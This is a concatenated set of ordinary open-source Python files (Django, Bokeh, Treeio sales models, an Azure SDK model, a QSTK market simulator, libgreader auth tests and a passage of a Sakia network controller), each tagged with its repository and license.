'Yomonda',
'Yonah',
'Yoninah',
'Yorick',
'York',
'Yosef',
'Yosefu',
'Y?shi',
'Yoshi',
'Yoshino',
'Ysabel',
'Ysanne',
'Yuk',
'Yuki',
'Yul',
'Yule',
'Yuma',
'Yuri',
'Yuval',
'Yves',
'Yvette',
'Yvon',
'Yvonne',
'Zaccheus',
'Zach',
'Zachariah',
'Zachary',
'Zaci',
'Zada',
'Zafira',
'Zahava',
'Zahur',
'Zaida',
'Zaide',
'Zaido',
'Zaila',
'Zainab',
'Zaira',
'Zaire',
'Zaki',
'Zak''nefein',
'Zalman',
'Zan',
'Zane',
'Zanna',
'Zara',
'Zareb',
'Zared',
'Zareh',
'Zarek',
'Zarifa',
'Zarina',
'Zarren',
'Zavad',
'Zaybian',
'Zaylyn',
'Zayn',
'Zayne',
'Zayo',
'Zaza',
'Zazu',
'Zbigniew',
'Ze''ev',
'Zea',
'Zeb',
'Zebidy',
'Zebulon',
'Zechariah',
'Zechuriah',
'Zed',
'Zef',
'Zeheb',
'Zeke',
'Zeki',
'Zelda',
'Zelia',
'Zelig',
'Zena',
'Zenas',
'Zene',
'Zenia',
'Zenobia',
'Zenon',
'Zephan',
'Zephiniah',
'Zeppelin',
'Zesiro',
'Zev',
'Zia',
'Ziazan',
'Ziggy',
'Zikomo',
'Zili',
'Zilli',
'Zimri',
'Zinna',
'Zinnia',
'Zion',
'Ziraili',
'Zita',
'Ziv',
'Ziva',
'Zivan',
'Ziven',
'Ziya',
'Zizi',
'Zo',
'Zoan',
'Zoe',
'Zoey',
'Zofia',
'Zohar',
'Zoie',
'Zola',
'Zolen',
'Zoltan',
'Zoltin',
'Zona',
'Zontee',
'Zorada',
'Zoraida',
'Zsa zsa',
'Zsuzsanna',
'Zula',
'Zuleika',
'Zulema',
'Zuriel',
'Zyta', ]
| jamespacileo/django-pure-pagination | example_project/core/names.py | Python | bsd-3-clause | 54,755 |
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from django.contrib import admin
from .models import *
admin.site.register(MessageInWaiting)
admin.site.register(ResponseInWaiting)
admin.site.register(Template)
| dimagi/rapidsms-contrib-apps-dev | training/admin.py | Python | bsd-3-clause | 215 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from ..core.templates import DOC_NB_JS
from ..core.json_encoder import serialize_json
from ..model import Model
from ..util.string import encode_utf8
from .elements import div_for_render_item
from .util import FromCurdoc, OutputDocumentFor, standalone_docs_json_and_render_items
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'notebook_content'
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
def notebook_content(model, notebook_comms_target=None, theme=FromCurdoc):
''' Return script and div that will display a Bokeh plot in a Jupyter
Notebook.
The data for the plot is stored directly in the returned HTML.
Args:
model (Model) : Bokeh object to render
notebook_comms_target (str, optional) :
A target name for a Jupyter Comms object that can update
the document that is rendered to this notebook div
theme (Theme, optional) :
Defaults to the ``Theme`` instance in the current document.
Setting this to ``None`` uses the default theme or the theme
already specified in the document. Any other value must be an
instance of the ``Theme`` class.
Returns:
script, div, Document
.. note::
Assumes :func:`~bokeh.io.notebook.load_notebook` or the equivalent
has already been executed.
'''
if not isinstance(model, Model):
raise ValueError("notebook_content expects a single Model instance")
# Comms handling relies on the fact that the new_doc returned here
# has models with the same IDs as they were started with
with OutputDocumentFor([model], apply_theme=theme, always_new=True) as new_doc:
(docs_json, [render_item]) = standalone_docs_json_and_render_items([model])
div = div_for_render_item(render_item)
render_item = render_item.to_json()
if notebook_comms_target:
render_item["notebook_comms_target"] = notebook_comms_target
script = DOC_NB_JS.render(
docs_json=serialize_json(docs_json),
render_items=serialize_json([render_item]),
)
return encode_utf8(script), encode_utf8(div), new_doc
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| stonebig/bokeh | bokeh/embed/notebook.py | Python | bsd-3-clause | 3,803 |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
"""
Sales module objects.
"""
from django.core.urlresolvers import reverse
from django.db import models
from treeio.core.models import Object, User, ModuleSetting
from treeio.identities.models import Contact
from treeio.finance.models import Transaction, Currency, Tax
from datetime import datetime, timedelta, time
from dateutil.relativedelta import relativedelta
from decimal import Decimal, ROUND_UP
from time import time as ttime
class SaleStatus(Object):
"Status of the Sale"
name = models.CharField(max_length=512)
use_leads = models.BooleanField()
use_opportunities = models.BooleanField()
use_sales = models.BooleanField()
active = models.BooleanField()
hidden = models.BooleanField()
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_status_view', args=[self.id])
except Exception:
return ""
class Meta:
"SalesStatus"
ordering = ('hidden', '-active', 'name')
class Product(Object):
"Single Product"
PRODUCT_TYPES = (
('service', 'Service'),
('good', 'Good'),
('subscription', 'Subscription'),
('compound', 'Compound'),
)
ACTION_CHOICES = (
('inactive', 'Mark Inactive'),
('notify', 'Notify'),
('ignore', 'Ignore'),
)
name = models.CharField(max_length=512)
product_type = models.CharField(max_length=32, default='good',
choices=PRODUCT_TYPES)
parent = models.ForeignKey('self', blank=True, null=True,
related_name='child_set')
code = models.CharField(max_length=512, blank=True, null=True)
supplier = models.ForeignKey(Contact, blank=True, null=True,
on_delete=models.SET_NULL)
supplier_code = models.IntegerField(blank=True, null=True)
buy_price = models.DecimalField(max_digits=20, decimal_places=2, default=0)
sell_price = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
stock_quantity = models.IntegerField(blank=True, null=True)
active = models.BooleanField()
runout_action = models.CharField(max_length=32, blank=True, null=True,
choices=ACTION_CHOICES)
details = models.TextField(blank=True, null=True)
access_inherit = ('parent', '*module', '*user')
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_product_view', args=[self.id])
except:
return ""
class Meta:
"Product"
ordering = ['code']
class SaleSource(Object):
"Source of Sale e.g. Search Engine"
name = models.CharField(max_length=512)
active = models.BooleanField(default=False)
details = models.TextField(blank=True, null=True)
searchable = False
def __unicode__(self):
return unicode(self.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_source_view', args=[self.id])
except Exception:
return ""
class Meta:
"SaleSource"
ordering = ('-active', 'name')
class Lead(Object):
"Lead"
CONTACT_METHODS = (
('email', 'E-Mail'),
('phone', 'Phone'),
('post', 'Post'),
('face', 'Face to Face')
)
contact = models.ForeignKey(Contact)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
products_interested = models.ManyToManyField(
Product, blank=True, null=True)
contact_method = models.CharField(max_length=32, choices=CONTACT_METHODS)
assigned = models.ManyToManyField(User, related_name='sales_lead_assigned',
blank=True, null=True)
status = models.ForeignKey(SaleStatus)
details = models.TextField(blank=True, null=True)
access_inherit = ('contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact.name)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_lead_view', args=[self.id])
except Exception:
return ""
class Meta:
"Lead"
ordering = ['contact']
class Opportunity(Object):
"Opportunity"
lead = models.ForeignKey(
Lead, blank=True, null=True, on_delete=models.SET_NULL)
contact = models.ForeignKey(Contact)
products_interested = models.ManyToManyField(Product)
source = models.ForeignKey(
SaleSource, blank=True, null=True, on_delete=models.SET_NULL)
expected_date = models.DateField(blank=True, null=True)
closed_date = models.DateField(blank=True, null=True)
assigned = models.ManyToManyField(
User, related_name='sales_opportunity_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
probability = models.DecimalField(
max_digits=3, decimal_places=0, blank=True, null=True)
amount = models.DecimalField(max_digits=20, decimal_places=2, default=0)
amount_currency = models.ForeignKey(Currency)
amount_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('lead', 'contact', '*module', '*user')
def __unicode__(self):
return unicode(self.contact)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_opportunity_view', args=[self.id])
except Exception:
return ""
class Meta:
"Opportunity"
ordering = ['-expected_date']
class SaleOrder(Object):
"Sale Order"
reference = models.CharField(max_length=512, blank=True, null=True)
datetime = models.DateTimeField(default=datetime.now)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
opportunity = models.ForeignKey(
Opportunity, blank=True, null=True, on_delete=models.SET_NULL)
payment = models.ManyToManyField(Transaction, blank=True, null=True)
source = models.ForeignKey(SaleSource)
assigned = models.ManyToManyField(
User, related_name='sales_saleorder_assigned', blank=True, null=True)
status = models.ForeignKey(SaleStatus)
currency = models.ForeignKey(Currency)
total = models.DecimalField(max_digits=20, decimal_places=2, default=0)
total_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
details = models.TextField(blank=True, null=True)
access_inherit = ('opportunity', 'client', '*module', '*user')
def fulfil(self):
"Fulfil"
for p in self.orderedproduct_set.all():
if not p.fulfilled:
product = p.product
product.stock_quantity -= p.quantity
product.save()
p.fulfilled = True
p.save()
if p.subscription:
p.subscription.renew()
def get_next_reference(self):
try:
# Very dirty hack, but kinda works for reference (i.e. it doesn't
# have to be unique)
next_ref = SaleOrder.objects.all().aggregate(
models.Max('id'))['id__max'] + 1
except:
next_ref = 1
full_ref = '%.5d/%s' % (next_ref, str(str(ttime() * 10)[8:-2]))
return full_ref
def save(self, *args, **kwargs):
"Automatically set order reference"
super(SaleOrder, self).save(*args, **kwargs)
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
fulfil_status = long(conf.value)
if self.status.id == fulfil_status:
self.fulfil()
except Exception:
pass
def __unicode__(self):
return unicode(self.reference)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_order_view', args=[self.id])
except Exception:
return ""
def get_taxes(self, base=False):
# TODO: Compound taxes
taxes = {}
ops = self.orderedproduct_set.filter(
trash=False).filter(tax__isnull=False)
for p in ops:
if base:
item_total = p.get_total()
else:
item_total = p.get_total_display()
if p.tax.id in taxes:
taxes[p.tax.id]['amount'] += (item_total * (p.tax.rate / 100)).quantize(Decimal('.01'), rounding=ROUND_UP)
else:
taxes[p.tax.id] = {'name': p.tax.name, 'rate': p.tax.rate,
'amount': (item_total * (p.tax.rate / 100))
.quantize(Decimal('.01'), rounding=ROUND_UP)}
return taxes
def get_taxes_total(self):
taxes = self.get_taxes()
total = 0
for tax in taxes.values():
total += tax['amount']
return total
def get_subtotal(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
self.total = sum
return sum
def get_subtotal_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
self.total_display = sum
return sum
def get_total(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total()
sum += self.get_taxes_total()
self.total = sum
return sum
def get_total_display(self):
sum = 0
for p in self.orderedproduct_set.filter(trash=False):
sum += p.get_total_display()
sum += self.get_taxes_total()
self.total_display = sum
return sum
def update_total(self):
self.get_total()
self.get_total_display()
self.save()
def get_total_paid(self):
return Decimal(self.payment.filter(trash=False).aggregate(models.Sum('value_display'))['value_display__sum'] or '0')
def balance_due(self):
return self.get_total() - self.get_total_paid()
class Meta:
"SaleOrder"
ordering = ['-datetime']
class Subscription(Object):
"Subscription"
CYCLE_PERIODS = (
('daily', 'Daily'),
('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly', 'Quarterly'),
('yearly', 'Yearly')
)
client = models.ForeignKey(
Contact, blank=True, null=True, on_delete=models.SET_NULL)
product = models.ForeignKey(Product, blank=True, null=True)
start = models.DateField(default=datetime.now)
expiry = models.DateField(blank=True, null=True)
cycle_period = models.CharField(max_length=32, choices=CYCLE_PERIODS,
default='month')
cycle_end = models.DateField(blank=True, null=True)
active = models.BooleanField(default=False)
details = models.CharField(max_length=512, blank=True, null=True)
access_inherit = ('client', 'product', '*module', '*user')
def get_cycle_start(self):
"Get the cycle start date"
if not self.cycle_end:
return None
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
cycle_start = cycle_end - p
return cycle_start
def renew(self):
"Renew"
if self.cycle_period == 'monthly':
p = relativedelta(months=+1)
elif self.cycle_period == 'daily':
p = timedelta(days=1)
elif self.cycle_period == 'weekly':
p = timedelta(weeks=1)
elif self.cycle_period == 'quarterly':
p = relativedelta(months=+4)
elif self.cycle_period == 'yearly':
p = relativedelta(years=1)
else:
p = relativedelta(months=+1)
self.cycle_end = datetime.now().date() + p
self.save()
def activate(self):
"Activate"
if self.active:
return
self.renew()
self.active = True
self.save()
def deactivate(self):
"Deactivate"
if not self.active:
return
self.active = False
self.save()
def invoice(self):
"Create a new sale order for self"
new_invoice = SaleOrder()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'default_order_status')[0]
new_invoice.status = long(conf.value)
except Exception:
ss = SaleStatus.objects.all()[0]
new_invoice.status = ss
so = SaleSource.objects.all()[0]
new_invoice.source = so
new_invoice.client = self.client
new_invoice.reference = "Subscription Invoice " + \
str(datetime.today().strftime('%Y-%m-%d'))
new_invoice.save()
try:
op = self.orderedproduct_set.filter(
trash=False).order_by('-date_created')[0]
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = op.quantity
opn.discount = op.discount
opn.subscription = self
opn.save()
except IndexError:
opn = OrderedProduct()
opn.order = new_invoice
opn.product = self.product
opn.quantity = 1
opn.subscription = self
opn.save()
return new_invoice.reference
def check_status(self):
"""
Checks and sets the state of the subscription
"""
if not self.active:
return 'Inactive'
if self.expiry:
if datetime.now() > datetime.combine(self.expiry, time.min):
self.deactivate()
return 'Expired'
if not self.cycle_end:
self.renew()
cycle_end = self.cycle_end
# check if we're in the 5 day window before the cycle ends for this
# subscription
if datetime.now().date() >= cycle_end:
cycle_start = self.get_cycle_start()
# if we haven't already invoiced them, invoice them
grace = 3
if (datetime.now().date() - cycle_end > timedelta(days=grace)):
# Subscription has overrun and must be shut down
return self.deactivate()
try:
conf = ModuleSetting.get_for_module(
'treeio.sales', 'order_fulfil_status')[0]
order_fulfil_status = SaleStatus.objects.get(
pk=long(conf.value))
except Exception:
order_fulfil_status = None
if self.orderedproduct_set.filter(order__datetime__gte=cycle_start).filter(order__status=order_fulfil_status):
return 'Paid'
elif self.orderedproduct_set.filter(order__datetime__gte=cycle_start):
return 'Invoiced'
else:
self.invoice()
return 'Invoiced'
else:
return 'Active'
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_subscription_view', args=[self.id])
except Exception:
return ""
class Meta:
"Subscription"
ordering = ['expiry']
class OrderedProduct(Object):
"Ordered Product"
subscription = models.ForeignKey(Subscription, blank=True, null=True)
product = models.ForeignKey(Product)
quantity = models.DecimalField(max_digits=30, decimal_places=2, default=1)
discount = models.DecimalField(max_digits=5, decimal_places=2, default=0)
tax = models.ForeignKey(
Tax, blank=True, null=True, on_delete=models.SET_NULL)
rate = models.DecimalField(max_digits=20, decimal_places=2)
rate_display = models.DecimalField(
max_digits=20, decimal_places=2, default=0)
order = models.ForeignKey(SaleOrder)
description = models.TextField(blank=True, null=True)
fulfilled = models.BooleanField(default=False)
access_inherit = ('order', '*module', '*user')
def __unicode__(self):
return unicode(self.product)
def get_absolute_url(self):
"Returns absolute URL"
try:
return reverse('sales_ordered_view', args=[self.id])
except Exception:
return ""
def get_total(self):
"Returns total sum for this item"
total = self.rate * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
def get_total_display(self):
"Returns total sum for this item in the display currency"
total = self.rate_display * self.quantity
if self.discount:
total = total - (total * self.discount / 100)
if total < 0:
total = Decimal(0)
return total.quantize(Decimal('.01'), rounding=ROUND_UP)
class Meta:
ordering = ['product']
| havard024/prego | sales/models.py | Python | mit | 17,973 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class OperationDisplay(Model):
"""Display metadata associated with the operation.
:param provider: Service provider: Microsoft Network.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: Type of the operation: get, read, delete, etc.
:type operation: str
:param description: Description of the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(self, provider=None, resource=None, operation=None, description=None):
super(OperationDisplay, self).__init__()
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
| AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_11_01/models/operation_display.py | Python | mit | 1,498 |
import datetime as dt
import numpy as np
import pandas as pd
# QSTK Imports
import QSTK.qstkutil.DataAccess as da
import QSTK.qstkutil.qsdateutil as du
def get_orders_list(s_file_path):
l_columns = ["year", "month", "day", "sym", "type", "num"]
df_orders_list = pd.read_csv(s_file_path, sep=',', header=None)
df_orders_list = df_orders_list.dropna(axis=1, how='all')
df_orders_list.columns = l_columns
return df_orders_list
def get_orders(df_orders_list):
na_orders_list = df_orders_list.values
l_orders = []
ld_daily_orders = None
for order in na_orders_list:
dt_date = dt.datetime(order[0], order[1], order[2], hour=16)
d_order = {df_orders_list.columns[3]: order[3], \
df_orders_list.columns[4]: order[4], \
df_orders_list.columns[5]: int(order[5])}
if l_orders != [] and dt_date == l_orders[-1][0]:
l_orders[-1][1].append(d_order)
else:
ld_daily_orders = []
ld_daily_orders.append(d_order)
l_orders.append([dt_date, ld_daily_orders])
na_orders = np.array(l_orders)
df_orders = pd.DataFrame(na_orders[:, 1], index=na_orders[:, 0], columns=["ord"])
df_orders = df_orders.sort()
dt_start = df_orders.ix[0].name
dt_end = df_orders.ix[-1].name
ls_symbols = list(set(df_orders_list["sym"]))
ls_symbols.sort() # It is neccesary to sort due the use of set
return df_orders, dt_start, dt_end, ls_symbols
def get_data(dt_start, dt_end, ls_symbols):
ldt_timestamps = du.getNYSEdays(dt_start, dt_end, dt.timedelta(hours=16))
ls_keys = ["open", "high", "low", "close", "volume", "actual_close"]
dataobj = da.DataAccess('Yahoo')
ldf_data = dataobj.get_data(ldt_timestamps, ls_symbols, ls_keys)
d_data = dict(zip(ls_keys, ldf_data))
for s_key in ls_keys:
d_data[s_key] = d_data[s_key].fillna(method="ffill")
d_data[s_key] = d_data[s_key].fillna(method="bfill")
d_data[s_key] = d_data[s_key].fillna(1.0)
return d_data
def get_prices(dt_start, dt_end, ls_symbols, s_key="close"):
# close = adjusted close
# actual_close = actual close
d_data = get_data(dt_start, dt_end, ls_symbols)
return d_data[s_key]
def process_daily_orders(dt_date, df_orders, df_prices, df_num, df_val, df_res):
op = 0
daily_orders = list(df_orders.ix[dt_date, "ord"])
for order in daily_orders:
if order["type"] == "Buy":
op = 1
elif order["type"] == "Sell":
op = -1
df_num.ix[dt_date, order["sym"]] += op * order["num"]
df_res.ix[dt_date, "cash"] += -op * order["num"] * df_prices.ix[dt_date, order["sym"]]
def update_port(dt_date, dt_last_orders_date, ls_symbols, df_num, df_res):
for s_symbol in ls_symbols:
df_num.ix[dt_date, s_symbol] = df_num.ix[dt_last_orders_date, s_symbol]
df_res.ix[dt_date, "cash"] = df_res.ix[dt_last_orders_date, "cash"]
def value_port(dt_date, ls_symbols, df_prices, df_num, df_val, df_res):
for s_symbol in ls_symbols:
df_val.ix[dt_date, s_symbol] = df_num.ix[dt_date, s_symbol] * df_prices.ix[dt_date, s_symbol]
df_res.ix[dt_date, "port"] = np.sum(df_val.ix[dt_date, :])
df_res.ix[dt_date, "total"] = df_res.ix[dt_date, "port"] + df_res.ix[dt_date, "cash"]
def process_orders(df_orders, df_prices, cash):
ldt_dates = list(df_prices.index)
ls_symbols = list(df_prices.columns)
df_num = pd.DataFrame(index=ldt_dates, columns=ls_symbols)
df_val = pd.DataFrame(index=ldt_dates, columns=ls_symbols)
df_res = pd.DataFrame(index=ldt_dates, columns=["port", "cash", "total"])
df_num = df_num.fillna(0.0)
df_val = df_val.fillna(0.0)
df_res = df_res.fillna(0.0)
df_res.ix[0, "cash"] = cash
ldt_orders_dates = list(df_orders.index)
iter_orders_dates = iter(ldt_orders_dates)
dt_orders_date = iter_orders_dates.next()
dt_last_orders_date = dt_orders_date
for dt_date in ldt_dates:
update_port(dt_date, dt_last_orders_date, ls_symbols, df_num, df_res)
if dt_date == dt_orders_date:
process_daily_orders(dt_date, df_orders, df_prices, df_num, df_val, df_res)
try:
dt_last_orders_date = dt_orders_date
dt_orders_date = iter_orders_dates.next()
except StopIteration:
pass
value_port(dt_date, ls_symbols, df_prices, df_num, df_val, df_res)
df_port = df_num.join(df_val, lsuffix="_num", rsuffix="_val").join(df_res)
#df_port.to_csv("port.csv")
return df_port
def save_values(df_port, s_out_file_path):
ldt_dates = df_port.index
na_dates = np.array([[dt_date.year, dt_date.month, dt_date.day] for dt_date in ldt_dates])
na_total = np.array(df_port["total"])
na_values = np.insert(arr=na_dates, obj=3, values=na_total, axis=1)
df_values = pd.DataFrame(na_values, columns=["year", "month", "day", "total"])
df_values.to_csv(s_out_file_path, sep=",", header=False, index=False)
if __name__ == '__main__':
print "start market_sim.py"
s_in_file_path = "data\\q1_orders.csv"
s_out_file_path = "data\\q1_values.csv"
s_cash = "100000"
f_cash = float(s_cash)
df_orders_list = get_orders_list(s_in_file_path)
df_orders, dt_start, dt_end, ls_symbols = get_orders(df_orders_list)
df_prices = get_prices(dt_start, dt_end, ls_symbols)
df_port = process_orders(df_orders, df_prices, f_cash)
save_values(df_port, s_out_file_path)
print "end market_sim.py" | gdikos/qstk-on-ec2 | market_sim.py | Python | mit | 5,585 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
libG(oogle)Reader
Copyright (C) 2010 Matt Behrens <[email protected]> http://asktherelic.com
Python library for working with the unofficial Google Reader API.
Unit tests for oauth and ClientAuthMethod in libgreader.
"""
try:
import unittest2 as unittest
except:
import unittest
from libgreader import GoogleReader, OAuthMethod, OAuth2Method, ClientAuthMethod, Feed
import requests
import re
from .config import *
class TestClientAuthMethod(unittest.TestCase):
def test_ClientAuthMethod_login(self):
ca = ClientAuthMethod(username,password)
self.assertNotEqual(ca, None)
def test_reader(self):
ca = ClientAuthMethod(username,password)
reader = GoogleReader(ca)
self.assertNotEqual(reader, None)
def test_bad_user_details(self):
self.assertRaises(IOError, ClientAuthMethod, 'asdsa', '')
def test_reader_user_info(self):
ca = ClientAuthMethod(username,password)
reader = GoogleReader(ca)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
#automated approval of oauth url
#returns mechanize Response of the last "You have accepted" page
def automated_oauth_approval(url):
#general process is:
# 1. assume user isn't logged in, so get redirected to google accounts
# login page. login using test account credentials
# 2. redirected back to oauth approval page. br.submit() should choose the
# first submit on that page, which is the "Accept" button
br = mechanize.Browser()
br.open(url)
br.select_form(nr=0)
br["Email"] = username
br["Passwd"] = password
response1 = br.submit()
br.select_form(nr=0)
req2 = br.click(type="submit", nr=0)
response2 = br.open(req2)
return response2
@unittest.skip('deprecated')
class TestOAuth(unittest.TestCase):
def test_oauth_login(self):
auth = OAuthMethod(oauth_key, oauth_secret)
self.assertNotEqual(auth, None)
def test_getting_request_token(self):
auth = OAuthMethod(oauth_key, oauth_secret)
token, token_secret = auth.setAndGetRequestToken()
url = auth.buildAuthUrl()
response = automated_oauth_approval(url)
self.assertNotEqual(-1,response.get_data().find('You have successfully granted'))
def test_full_auth_process_without_callback(self):
auth = OAuthMethod(oauth_key, oauth_secret)
auth.setRequestToken()
auth_url = auth.buildAuthUrl()
response = automated_oauth_approval(auth_url)
auth.setAccessToken()
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
def test_full_auth_process_with_callback(self):
auth = OAuthMethod(oauth_key, oauth_secret)
#must be a working callback url for testing
auth.setCallback("http://www.asktherelic.com")
token, token_secret = auth.setAndGetRequestToken()
auth_url = auth.buildAuthUrl()
#callback section
#get response, which is a redirect to the callback url
response = automated_oauth_approval(auth_url)
query_string = urlparse.urlparse(response.geturl()).query
#grab the verifier token from the callback url query string
token_verifier = urlparse.parse_qs(query_string)['oauth_verifier'][0]
auth.setAccessTokenFromCallback(token, token_secret, token_verifier)
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
#automate getting the approval token
def mechanize_oauth2_approval(url):
"""
general process is:
1. assume user isn't logged in, so get redirected to google accounts
login page. login using account credentials
But, if the user has already granted access, the user is auto redirected without
having to confirm again.
2. redirected back to oauth approval page. br.submit() should choose the
first submit on that page, which is the "Accept" button
3. mechanize follows the redirect, and should throw 40X exception and
we return the token
"""
br = mechanize.Browser()
br.open(url)
br.select_form(nr=0)
br["Email"] = username
br["Passwd"] = password
try:
response1 = br.submit()
br.select_form(nr=0)
response2 = br.submit()
except Exception as e:
#watch for 40X exception on trying to load redirect page
pass
callback_url = br.geturl()
# split off the token in hackish fashion
return callback_url.split('code=')[1]
def automated_oauth2_approval(url):
"""
general process is:
1. assume user isn't logged in, so get redirected to google accounts
login page. login using account credentials
2. get redirected to oauth approval screen
3. authorize oauth app
"""
auth_url = url
headers = {'Referer': auth_url}
s = requests.Session()
r1 = s.get(auth_url)
post_data = dict((x[0],x[1]) for x in re.findall('name="(.*?)".*?value="(.*?)"', str(r1.content), re.MULTILINE))
post_data['Email'] = username
post_data['Passwd'] = password
post_data['timeStmp'] = ''
post_data['secTok'] = ''
post_data['signIn'] = 'Sign in'
post_data['GALX'] = s.cookies['GALX']
r2 = s.post('https://accounts.google.com/ServiceLoginAuth', data=post_data, headers=headers, allow_redirects=False)
#requests is fucking up the url encoding and double encoding ampersands
scope_url = r2.headers['location'].replace('amp%3B','')
# now get auth screen
r3 = s.get(scope_url)
# unless we have already authed!
if 'asktherelic' in r3.url:
code = r3.url.split('=')[1]
return code
post_data = dict((x[0],x[1]) for x in re.findall('name="(.*?)".*?value="(.*?)"', str(r3.content)))
post_data['submit_access'] = 'true'
post_data['_utf8'] = '☃'
# again, fucked encoding for amp;
action_url = re.findall('action="(.*?)"', str(r3.content))[0].replace('amp;','')
r4 = s.post(action_url, data=post_data, headers=headers, allow_redirects=False)
code = r4.headers['Location'].split('=')[1]
s.close()
return code
@unittest.skipIf("client_id" not in globals(), 'OAuth2 config not setup')
class TestOAuth2(unittest.TestCase):
def test_full_auth_and_access_userdata(self):
auth = OAuth2Method(client_id, client_secret)
auth.setRedirectUri(redirect_url)
url = auth.buildAuthUrl()
token = automated_oauth2_approval(url)
auth.code = token
auth.setAccessToken()
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
def test_oauth_subscribe(self):
auth = OAuth2Method(client_id, client_secret)
auth.setRedirectUri(redirect_url)
url = auth.buildAuthUrl()
token = automated_oauth2_approval(url)
auth.code = token
auth.setAccessToken()
auth.setActionToken()
reader = GoogleReader(auth)
slashdot = 'feed/http://rss.slashdot.org/Slashdot/slashdot'
#unsubscribe always return true; revert feedlist state
self.assertTrue(reader.unsubscribe(slashdot))
# now subscribe
self.assertTrue(reader.subscribe(slashdot))
# wait for server to update
import time
time.sleep(1)
reader.buildSubscriptionList()
# test subscribe successful
self.assertIn(slashdot, [x.id for x in reader.getSubscriptionList()])
if __name__ == '__main__':
unittest.main()
| askedrelic/libgreader | tests/test_auth.py | Python | mit | 7,823 |
from .model import NetworkModel
from .view import NetworkView
from PyQt5.QtWidgets import QAction, QMenu
from PyQt5.QtGui import QCursor, QDesktopServices
from PyQt5.QtCore import pyqtSlot, QUrl, QObject
from duniterpy.api import bma
from duniterpy.documents import BMAEndpoint
class NetworkController(QObject):
"""
The network panel
"""
def __init__(self, parent, view, model):
"""
Constructor of the navigation component
:param sakia.gui.network.view.NetworkView: the view
:param sakia.gui.network.model.NetworkModel model: the model
"""
super().__init__(parent)
self.view = view
self.model = model
table_model = self.model.init_network_table_model()
self.view.set_network_table_model(table_model)
self.view.manual_refresh_clicked.connect(self.refresh_nodes_manually)
self.view.table_network.customContextMenuRequested.connect(self.node_context_menu)
@classmethod
def create(cls, parent, app, network_service):
"""
:param PyQt5.QObject parent:
:param sakia.app.Application app:
:param sakia.services.NetworkService network_service:
:return:
"""
view = NetworkView(parent.view,)
